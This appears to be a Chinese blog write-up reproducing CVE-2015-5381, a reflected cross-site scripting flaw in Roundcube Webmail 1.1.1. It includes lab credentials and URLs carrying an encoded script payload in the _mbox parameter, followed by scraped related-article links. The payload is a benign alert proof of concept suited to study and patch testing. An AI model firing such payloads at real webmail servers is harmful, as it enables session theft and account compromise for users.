Preface

Software: https://roundcube.net/
Versions: 1.1.x<1.1.2
CVE: CVE-2015-5381
Author: sroesemann
Release date: 2015-5-30

Reference

Roundcube Webmail跨站脚本漏洞(CNVD-2017-08082)

XSS via _mbox-parameter in Roundcube v.1.1.1

环境搭建

请参考:CentOS6 安装Sendmail + Dovecot + Roundcubemail

漏洞复现

需要有效的账号密码才能触发:user1/123456

本地环境:http://mail.roundcube.com/roundcubemail-1.1.1/

Example:

https://{YOURSERVER}/?_task=mail&_mbox=INBOX%22%3E%3Cscript%3Ealert(%22Roundcube+v1.1.1+XSS%22)%3C%2Fscript%3E

http://mail.roundcube.com/roundcubemail-1.1.1/?_task=mail&_mbox=INBOX%22%3E%3Cscript%3Ealert(%22Roundcube+v1.1.1+XSS%22)%3C%2Fscript%3E

XSS触发...

转载于:https://www.cnblogs.com/Hi-blog/p/8776374.html

Roundcube Webmail跨站脚本漏洞(CVE-2015-5381 )相关推荐

  1. Roundcube Webmail信息泄露漏洞(CVE-2015-5383)

    Preface Software: https://roundcube.net/ Versions: 1.1.x<1.1.2(亲测1.1.5也有效) CVE: CVE-2015-5383 Aut ...

  2. Apache ‘mod_pagespeed’模块跨站脚本漏洞

    漏洞名称: Apache 'mod_pagespeed'模块跨站脚本漏洞 CNNVD编号: CNNVD-201310-677 发布时间: 2013-11-05 更新时间: 2013-11-05 危害等 ...

  3. WordPress podPress插件‘playerID’参数跨站脚本漏洞

    漏洞名称: WordPress podPress插件'playerID'参数跨站脚本漏洞 CNNVD编号: CNNVD-201303-206 发布时间: 2013-03-13 更新时间: 2013-0 ...

  4. phpMyAdmin import.php 跨站脚本漏洞

    漏洞名称: phpMyAdmin import.php 跨站脚本漏洞 CNNVD编号: CNNVD-201402-281 发布时间: 2014-02-21 更新时间: 2014-02-21 危害等级: ...

  5. WordPress yolink Search插件‘s’参数跨站脚本漏洞

    漏洞名称: WordPress yolink Search插件's'参数跨站脚本漏洞 CNNVD编号: CNNVD-201302-073 发布时间: 2013-02-05 更新时间: 2013-02- ...

  6. linux脚本漏洞,Silver Peak VX跨站脚本漏洞(CVE-2014-2975)

    发布日期:2014-07-28 更新日期:2014-07-30 受影响系统: silver peak Silver Peak VX 描述: ------------------------------ ...

  7. Wordpress prettyPhoto插件跨站脚本漏洞

    漏洞名称: Wordpress prettyPhoto插件跨站脚本漏洞 CNNVD编号: CNNVD-201311-413 发布时间: 2013-11-28 更新时间: 2013-11-28 危害等级 ...

  8. WordPress WP Photo Album Plus插件‘wppa-tag’跨站脚本漏洞

    漏洞名称: WordPress WP Photo Album Plus插件'wppa-tag'跨站脚本漏洞 CNNVD编号: CNNVD-201301-458 发布时间: 2013-01-24 更新时 ...

  9. phpMyAdmin ‘tbl_gis_visualization.php’多个跨站脚本漏洞

    漏洞名称: phpMyAdmin 'tbl_gis_visualization.php'多个跨站脚本漏洞 CNNVD编号: CNNVD-201304-152 发布时间: 2013-04-12 更新时间 ...

最新文章

  1. ROS学习(五):package.xml 文件
  2. java alsa 编程_搭建JavaWeb开发环境
  3. 顺序表的基本操作实验报告_INDIRECT函数从入门到进阶之相同顺序跨表引用
  4. UVA 10142 Australian Voting(模拟)
  5. 我回答的一个粉丝关于用编程语言模拟SAP事务的问题
  6. 亚伦•斯沃茨:提升时间的品质
  7. Python模块之MyQR——制作个性化动态二维码(超详细)
  8. 【华为云实战开发】1.传统Java项目怎么能变得高大上?
  9. HP服务器和H3C交换机端口绑定
  10. 电脑删除的文件去哪了?删除的数据恢复,居然有3个方法…
  11. 外汇EA是什么?外汇EA有什么用呢?能赚钱吗?
  12. 基于virtualbox 的虚拟路由器搭建
  13. golang中零停机重启服务之套接字复用,endless
  14. elementui去掉表格所有边框
  15. 这家自动驾驶公司在招聘感知实习研究员!
  16. 有线通信技术类毕业论文文献(推荐10篇)
  17. 电脑重装系统可能会遇到的几个问题
  18. Proteus8.9 VSM Studio GCC编译器仿真STM32F407ZGT6系列011_lcd1602_并口
  19. 触摸屏“G+G、G+P、G+F”是什么意思?
  20. BUILD_PREBUILT

热门文章

  1. HDU - 1272小希的迷宫
  2. 什么是Ultrabook
  3. FreeSync是什么
  4. 没有任何一个行业是没有竞争的
  5. 绝大部分人都错误的把赚钱或者人生都放在依靠外界
  6. 从2019年开始,越来越多的人关注“副业”这个词
  7. 改进后的新String类
  8. 谷歌浏览器怎么查找和改变编码格式
  9. Android数据存储——内部存储
  10. linux下文件时间戳